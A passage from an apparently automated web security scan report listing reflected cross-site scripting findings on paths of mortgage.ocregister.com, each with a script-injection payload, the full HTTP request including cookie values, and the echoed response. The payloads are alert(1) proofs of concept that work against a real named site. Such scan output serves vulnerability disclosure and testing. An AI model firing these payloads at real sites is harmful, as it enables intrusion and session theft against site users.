<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009aae10\"><script>alert(1)</script>bd79c7c5eb/02/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14452"><script>alert(1)</script>9b71eedb14c was submitted in the REST URL parameter 2. This input was echoed as 14452\"><script>alert(1)</script>9b71eedb14c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/0214452"><script>alert(1)</script>9b71eedb14c/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:54 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:55 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0214452\"><script>alert(1)</script>9b71eedb14c/feed/" /> ...[SNIP]...
1.287. http://mortgage.ocregister.com/2009/02/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/02/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a46c5"><script>alert(1)</script>3744f3c36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a46c5\"><script>alert(1)</script>3744f3c36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/02/?a46c5"><script>alert(1)</script>3744f3c36=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:13:32 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 100730
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/02/?a46c5\"><script>alert(1)</script>3744f3c36=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b293"><script>alert(1)</script>6ae8dc92a5 was submitted in the REST URL parameter 1. This input was echoed as 6b293\"><script>alert(1)</script>6ae8dc92a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20096b293"><script>alert(1)</script>6ae8dc92a5/03/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:42 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20096b293\"><script>alert(1)</script>6ae8dc92a5/03/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caa27"><script>alert(1)</script>d1503a6c825 was submitted in the REST URL parameter 2. This input was echoed as caa27\"><script>alert(1)</script>d1503a6c825 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/03caa27"><script>alert(1)</script>d1503a6c825/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:52 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:52 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/03caa27\"><script>alert(1)</script>d1503a6c825/feed/" /> ...[SNIP]...
1.290. http://mortgage.ocregister.com/2009/03/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/03/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 572c6"><script>alert(1)</script>7284a87d77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 572c6\"><script>alert(1)</script>7284a87d77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/03/?572c6"><script>alert(1)</script>7284a87d77=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:13:32 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 90786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/03/?572c6\"><script>alert(1)</script>7284a87d77=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f1d"><script>alert(1)</script>e69b8dc3898 was submitted in the REST URL parameter 1. This input was echoed as e5f1d\"><script>alert(1)</script>e69b8dc3898 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009e5f1d"><script>alert(1)</script>e69b8dc3898/04/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:37 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:37 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009e5f1d\"><script>alert(1)</script>e69b8dc3898/04/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a43"><script>alert(1)</script>1a1ab7a0c99 was submitted in the REST URL parameter 2. This input was echoed as b1a43\"><script>alert(1)</script>1a1ab7a0c99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/04b1a43"><script>alert(1)</script>1a1ab7a0c99/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:51 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:52 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/04b1a43\"><script>alert(1)</script>1a1ab7a0c99/feed/" /> ...[SNIP]...
1.293. http://mortgage.ocregister.com/2009/04/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/04/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d59d"><script>alert(1)</script>7366da0a954 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3d59d\"><script>alert(1)</script>7366da0a954 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/04/?3d59d"><script>alert(1)</script>7366da0a954=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:13:21 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 106435
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/04/?3d59d\"><script>alert(1)</script>7366da0a954=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36880"><script>alert(1)</script>180f3a1c883 was submitted in the REST URL parameter 1. This input was echoed as 36880\"><script>alert(1)</script>180f3a1c883 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200936880"><script>alert(1)</script>180f3a1c883/05/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:48 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:49 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200936880\"><script>alert(1)</script>180f3a1c883/05/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e2f"><script>alert(1)</script>c8e7e3442e9 was submitted in the REST URL parameter 2. This input was echoed as f9e2f\"><script>alert(1)</script>c8e7e3442e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/05f9e2f"><script>alert(1)</script>c8e7e3442e9/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:52 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:52 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/05f9e2f\"><script>alert(1)</script>c8e7e3442e9/feed/" /> ...[SNIP]...
1.296. http://mortgage.ocregister.com/2009/05/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/05/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d00"><script>alert(1)</script>437786ed55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91d00\"><script>alert(1)</script>437786ed55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/05/?91d00"><script>alert(1)</script>437786ed55=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:13:32 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 112123
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/05/?91d00\"><script>alert(1)</script>437786ed55=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9c15"><script>alert(1)</script>ad967443caf was submitted in the REST URL parameter 1. This input was echoed as c9c15\"><script>alert(1)</script>ad967443caf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009c9c15"><script>alert(1)</script>ad967443caf/06/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:22 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:23 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009c9c15\"><script>alert(1)</script>ad967443caf/06/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a462c"><script>alert(1)</script>df7a2d0b05a was submitted in the REST URL parameter 2. This input was echoed as a462c\"><script>alert(1)</script>df7a2d0b05a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/06a462c"><script>alert(1)</script>df7a2d0b05a/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:35 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/06a462c\"><script>alert(1)</script>df7a2d0b05a/feed/" /> ...[SNIP]...
1.299. http://mortgage.ocregister.com/2009/06/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/06/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80c8f"><script>alert(1)</script>e0e37e5be57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80c8f\"><script>alert(1)</script>e0e37e5be57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/06/?80c8f"><script>alert(1)</script>e0e37e5be57=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:13:16 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 114372
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/06/?80c8f\"><script>alert(1)</script>e0e37e5be57=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7881c"><script>alert(1)</script>3c2f217435e was submitted in the REST URL parameter 1. This input was echoed as 7881c\"><script>alert(1)</script>3c2f217435e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20097881c"><script>alert(1)</script>3c2f217435e/07/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:19 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:19 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20097881c\"><script>alert(1)</script>3c2f217435e/07/feed/" /> ...[SNIP]...
